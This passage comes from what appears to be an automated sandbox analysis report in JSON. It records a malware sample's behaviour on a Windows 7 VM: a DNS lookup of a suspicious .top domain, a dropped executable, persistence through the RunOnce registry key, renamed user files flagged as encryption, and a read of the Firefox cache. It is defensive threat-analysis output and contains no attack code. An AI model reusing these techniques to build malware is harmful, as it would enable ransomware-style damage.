"analyzer_version": "2.2.0", "chrome_version": "59.0.3071.109", "firefox_version": "25.0", "flash_version": "10.3.183.86", "internet_explorer_version": "8.0.7601.17514", "java_version": "7.0.600", "microsoft_excel_version": "14.0.4762.1000", "microsoft_office_version": "14.0.4762.1000", "microsoft_power_point_version": "14.0.4762.1000", "microsoft_project_version": "14.0.4762.1000", "microsoft_publisher_version": "14.0.4762.1000", "microsoft_visio_version": "14.0.4762.1000", "microsoft_word_version": "14.0.4762.1000", "silverlight_version": "not_installed", "type": "vm_and_analyzer_details", "version": 1, "vm_architecture": "x86_64-bit", "vm_kernel_version": "6.1.7601.17514_(3844dbb9-2017-4967-be7a-a4a2c20430fa)", "vm_name": null, "vm_os": "windows_7" }, "vti": { "type": "vti", "version": 1, "vti_built_in_rules_version": "2.6", "vti_rule_matches": [ { "artifacts": { "files": [], "ips": [ { "ip_address": "54.205.205.46", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_request_dns", "operation_desc": "Perform DNS request", "ref_gfncalls": [ { "ref_id": "gfn_1101", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_request_dns_by_name", "technique_desc": "Resolve host name \"weekendfakc.top\".", "technique_path": "built_in._network._request_dns.vmray_request_dns_by_name", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1165", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Users\\YBZ8BT~1\\AppData\\Local\\Temp13684.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Global\\.net clr networking", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_1177", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"Global\\.net clr networking\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [ { "operations": [ "write" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [], "version": 1 }, "category": "_persistence", "category_desc": "Persistence", "operation": "_install_startup_script", "operation_desc": "Install system startup script or application", "ref_gfncalls": [ { "ref_id": "gfn_1296", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_startup_script_by_registry", "technique_desc": "Add \"C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Temp13684.exe\" to windows startup via registry.", "technique_path": "built_in._persistence._install_startup_script.vmray_install_startup_script_by_registry", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_1311", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\desktop.ini", "hashes": [ { "md5_hash": "ca471b303bbcbe0ad8f75bb9ea51caa7", "sha1_hash": "17b0a0387f65b70c9f112dc86c3c12be69f6b374", "sha256_hash": "f6d36c9c57adc572ba16be91e2eb372438b0f00f4087586339f7ab6e7732c078", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_1355", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Searches\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\searches\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_1694", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\ybz8btyyvts 7lfsqb0g\\searches\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Saved Games\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\saved games\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_1717", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\ybz8btyyvts 7lfsqb0g\\saved games\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\bAzjHbM7.jpg.4035", "hashes": [ { "md5_hash": "1adc5c394adb07ac7f2a6edc35655b01", "sha1_hash": "aa21580bd2c759b0d7e20b361c99c0dc4a165280", "sha256_hash": "97c428b1b036457703936b271228699bd116e399d1a5b01db603665a282f1b1a", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\bazjhbm7.jpg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\bAzjHbM7.jpg", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\bazjhbm7.jpg", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_rename_user_files", "operation_desc": "Rename user files", "ref_gfncalls": [ { "ref_id": "gfn_1841", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_rename_user_files", "technique_desc": "Rename multiple user files. This is an indicator for an encryption attempt.", "technique_path": "built_in._file_system._rename_user_files.vmray_rename_user_files", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_1843", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_1969", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\ybz8btyyvts 7lfsqb0g\\music\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Links\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\links\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_2079", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\ybz8btyyvts 7lfsqb0g\\links\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_2097", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Links\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\links\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_2169", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\links\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Downloads\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\downloads\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_2189", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\ybz8btyyvts 7lfsqb0g\\downloads\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_2227", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\My Shapes\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\my shapes\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_2417", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\my shapes\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_2457", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Contacts\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\contacts\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_2623", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\ybz8btyyvts 7lfsqb0g\\contacts\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_3548", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\J34QD0IO\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\j34qd0io\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_3558", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\j34qd0io\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\793TK2YX\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\793tk2yx\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_3564", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\793tk2yx\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\53XUACO8\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\53xuaco8\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_3570", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\53xuaco8\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\4PEP48KS\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\4pep48ks\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_3576", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\4pep48ks\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\history\\history.ie5\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_3822", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\history\\history.ie5\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\OfflineCache\\index.sqlite", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\offlinecache\\index.sqlite", "operations": [ "read" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_browser", "category_desc": "Browser", "operation": "_browser_data_cache", "operation_desc": "Read data related to browser cache", "ref_gfncalls": [ { "ref_id": "gfn_4529", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_read_browser_cache", "technique_desc": "Read Firefox cache file \"C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\OfflineCache\\index.sqlite\".", "technique_path": "built_in._browser._browser_data_cache.vmray_read_browser_cache", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\Public\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\public\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_5553", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\public\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\Public\\Videos\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\public\\videos\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_5559", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\public\\videos\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\public\\videos\\sample videos\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_5565", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\public\\videos\\sample videos\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\Public\\Recorded TV\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\public\\recorded tv\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_5575", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\public\\recorded tv\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\public\\recorded tv\\sample media\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_5581", "ref_source": "glog", 